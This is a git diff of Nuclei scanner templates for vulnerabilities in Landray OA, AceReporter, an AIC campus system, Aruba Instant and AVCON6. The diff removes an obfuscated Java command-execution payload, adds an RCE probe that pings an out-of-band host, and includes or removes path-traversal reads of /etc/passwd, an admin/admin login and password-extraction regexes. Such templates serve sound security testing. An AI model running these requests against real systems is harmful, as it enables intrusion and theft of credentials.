13af3480b6..935d1617f4 100755 --- a/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-treexml-rce.yaml @@ -1,37 +1,44 @@ id: landray-oa-treexml-rce info: - name: Landray OA treexml.tmpl Script RCE - author: SleepingBag945 - severity: critical + name: Landray OA Treexml.tmpl - Remote Code Execution + author: tangxiaofeng7,SleepingBag945 + severity: high + description: | + There is a remote command execution vulnerability in Lanling OA treexml.tmpl. An attacker can obtain server permissions by sending a specific request package. reference: - - http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - tags: landray,oa,rce + - https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce/blob/main/landray-oa-treexml-rce.yaml + - https://vuls.info/PeiQi/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#_4 + metadata: + max-request: 1 + verified: true + fofa-query: app="Landray-OA系统" + tags: landray,oa,treexml,rce http: - raw: - | POST /data/sys-common/treexml.tmpl HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Cmd: echo '{{randstr}}' - Content-Type: application/x-www-form-urlencoded - Cookie: JSESSIONID=6D85ABCAEAAAC4B3A7F95FFE2AAF6C04 Pragma: no-cache - Accept-Encoding: gzip - - s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d + Content-Type: application/x-www-form-urlencoded + s_bean=ruleFormulaValidate&script=try {String cmd = "ping {{interactsh-url}}";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} matchers-condition: and matchers: - type: word + part: interactsh_protocol words: - - "Execute:" + - "dns" + - type: word + part: body words: - - "{{randstr}}" + - "<RestResponse><success>" + - "<confirm>" + condition: and + - type: status status: - 200 \ No newline at end of file diff --git a/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml b/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml index 391b41b8b2..e69de29bb2 100755 --- a/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml +++ b/http/vulnerabilities/other/acenet-acereporter-report-component-arbitrary-file-download.yaml @@ -1,32 +0,0 @@ -id: acenet-acereporter-report-component-arbitrary-file-download - -info: - name: AceNet AceReporter Report component Arbitrary file download - author: SleepingBag945 - severity: medium - description: | - The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory to download or read a file beyond the original specified path. - The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system. - metadata: - fofa-query: title="Login @ Reporter" || title="Technology, Inc." - tags: file download - -http: - - raw: - - | - GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt HTTP/1.1 - Host: {{Hostname}} - - - - | - GET /view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt HTTP/1.1 - Host: {{Hostname}} - - - - matchers: - - type: dsl - dsl: - - 'contains(body_1,"root") && contains(body_1,"daemon")' - - 'status_code_2 == 200 && contains(body_2,"127.0.0.1")' - condition: and diff --git a/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml b/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml index 89eae9d35b..9b58c3399c 100755 --- a/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml +++ b/http/vulnerabilities/other/aic-intelligent-campus-system-password-leak.yaml @@ -1,39 +1,38 @@ -id: aic-intelligent-campus-system-password-leak +id: aic-intelligent-password-leak info: - name: AIC Intelligent Campus System Password Leak + name: AIC Intelligent Campus System - Password Leak author: SleepingBag945 severity: medium description: | Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br> metadata: + max-request: 1 fofa-query: title="AIC智能校园系统" - tags: Disclosure of Sensitive Information + tags: aic,exposure,password http: - - raw: - - | - GET /datacenter/dataOrigin.ashx?c=login HTTP/1.1 - Host: {{Hostname}} - - + - method: GET + path: + - "{{BaseURL}}/datacenter/dataOrigin.ashx?c=login" matchers: - type: dsl dsl: - - 'status_code == 200 && contains(body_1,"卡号") && contains(body_1,"密码")' + - 'status_code == 200 && contains(body_1,"卡号\":\"") && contains(body_1,"密码\":\"")' condition: and extractors: - - type: regex # type of the extractor + - type: regex name: username - part: body # part of the response (header,body,all) + part: body group: 1 regex: - - "\"卡号\":\"(.*?)\"" # regex to use for extraction. - - type: regex # type of the extractor + - "\"卡号\":\"(.*?)\"" + + - type: regex name: passwd - part: body # part of the response (header,body,all) + part: body group: 1 regex: - - "\"密码\":\"(.*?)\"" # regex to use for extraction. \ No newline at end of file + - "\"密码\":\"(.*?)\"" \ No newline at end of file diff --git a/http/vulnerabilities/other/aruba-instant-default-login.yaml b/http/vulnerabilities/other/aruba-instant-default-login.yaml deleted file mode 100755 index 0f317319bf..0000000000 --- a/http/vulnerabilities/other/aruba-instant-default-login.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aruba-instant-default-login - -info: - name: Aruba Instant password vulnerability - author: SleepingBag945 - severity: medium - description: | - Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.<br> - metadata: - fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" - tags: default Password - -http: - - raw: - - | - POST /swarm.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838 - - - matchers: - - type: dsl - dsl: - - 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")' - condition: and diff --git a/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml b/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml index 0f296f70fd..e69de29bb2 100755 --- a/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml +++ b/http/vulnerabilities/other/avcon6-org-execl-download-arbitrary-file-download.yaml @@ -1,25 +0,0 @@ -id: avcon6-org-execl-download-arbitrary-file-download - -info: - name: AVCON6 org_execl_download.action file down - author: SleepingBag945 - severity: medium - description: | - 华平软件视频会议 AVCON6 存在任意文件下载 